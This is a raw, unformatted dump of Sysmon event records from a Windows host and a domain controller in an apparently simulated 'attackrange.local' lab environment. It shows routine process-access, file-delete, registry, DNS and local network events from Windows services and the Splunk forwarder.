09:20:37.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980651Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:37.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980650Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:37.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980649Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:37.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980648Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:37.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980647Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:37.462{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8CE5-6151-057A-00000000FD01}516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980646Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:37.462{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8CE5-6151-057A-00000000FD01}516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980645Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:37.447{69CF5F33-8CE5-6151-057A-00000000FD01}516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980644Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:37.431{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99ED888079BDD487F761E630028BBB27,SHA256=8D87C52A118B192A5D4A9DEEF4C0F3D2FE37353C6BEF2A757376130C52BBA428,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001054479Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.097{5EBD8912-8CBD-6151-0B00-00000000FD01}640_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.1460-C:\Windows\System32\lsass.exe 23542300x80000000000000001054478Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:38.331{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6BDE91E1F6DF2909203C59D79C13AC56,SHA256=D6BA9A0172F09CF6FA101649A5BB19B68D6047351DE22711824DF4023AC8890E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980659Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:38.665{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBE456690AE4344904CA253A2D0B23E3,SHA256=33D95102F188DDEE90B91264892AD72698CB73990B3EB80C3CB342EE258E66D1,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000001054486Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:39.816{5EBD8912-8CD0-6151-2A00-00000000FD01}2404\Winsock2\CatalogChangeListener-964-0C:\Windows\system32\dns.exe 13241300x80000000000000001054485Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:39.816{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\system32\dns.exeHKLM\System\CurrentControlSet\Services\DNS\Parameters\PreviousLocalHostnamewin-dc-429.attackrange.local 10341000x80000000000000001054484Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:39.800{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30485|C:\Windows\system32\lsasrv.dll+2e31b|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 734700x80000000000000001054483Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:39.737{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000001054482Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:39.691{5EBD8912-8CBD-6151-0B00-00000000FD01}640672C:\Windows\system32\lsass.exe{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\system32\dns.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054481Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:39.691{5EBD8912-8CBD-6151-0B00-00000000FD01}640672C:\Windows\system32\lsass.exe{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001054480Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:39.691{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\Global Catalog Promotion CompleteDWORD (0x00000001) 23542300x8000000000000000980660Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:39.790{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38AA7081B51239206A116FBB029493B4,SHA256=3B9B5C697BFF0CF81DE01E3133B2DDA9DFBF15ABE9008A5B39F3872790A290EA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054552Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:39.803{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49709-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001054551Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:39.803{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49709-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001054550Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:39.774{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local65491- 354300x80000000000000001054549Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:39.774{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local65491-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domain 354300x80000000000000001054548Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:39.684{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49708-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49672- 354300x80000000000000001054547Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:39.684{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49708-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49672- 354300x80000000000000001054546Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:39.684{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49707-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001054545Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:39.684{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49707-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001054544Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:39.683{5EBD8912-8CBF-6151-0D00-00000000FD01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49706-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 354300x80000000000000001054543Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:39.683{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49706-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 354300x80000000000000001054542Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:39.681{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local63594- 23542300x80000000000000001054541Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.909{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABD1001E3E4043BA65F265D3144E3B52,SHA256=1822F6818877EFC13BB323E8BA3B8E687D79CF8795EE7A11BC605C4B6ED541A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054540Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.909{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F558BABC05FFA04FCCDF3AA68DE26A45,SHA256=B125A35439406A0F5DF7F272B76974B56447ED7E20980ACB03CD05224ED4B923,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054539Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.894{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\DNS ServerMD5=6DE325B548EE18D978840DBC70EC1246,SHA256=817C43FA5EAAA3A3743B38CBA12DDFB8EC9BE61F90A93072F40F225E1B9F3535,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054538Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.894{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=91FEE469CA914E8735497339EBEFF56D,SHA256=5EEB3D7205A7DC05D437C60E32F1DC5C8CD2175F59C9A757C7DDF291440A12B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054537Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.894{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Directory ServiceMD5=6E5CDFD208A8D56568294B1F7345D095,SHA256=95D44EEE96610C6ACFBB765BD5A8C17F8806A6414D2B4831D2CDD7F52AB556DA,IMPHASH=00000000000000000000000000000000falsetrue 734700x80000000000000001054536Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.597{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\System32\svchost.exeC:\Windows\System32\NetSetupSvc.dll10.0.14393.4467 (rs1_release.210604-1844)Network Setup ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationNETSETUPSVC.DLLMD5=9DFC2E95D31B43B2833D3760C7E00A4B,SHA256=894FB2AC7BA15C6CCDBC62480B27A01A8FAE5B55E13D537251986D87B5A12483,IMPHASH=14F8BB5E943EA23F79CC3EC6B8C493FBtrueMicrosoft WindowsValid 23542300x80000000000000001054535Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.519{5EBD8912-8CC0-6151-1600-00000000FD01}1296NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\WindowsUpdate.logMD5=038356387332650843BCB352BB89A101,SHA256=492C9B102256321FB5598FF87ED5BCCAB8159F36DD8416CE4011FFBF5E96048D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054534Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.409{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1700-00000000FD01}1396C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054533Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.409{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054532Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001054531Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 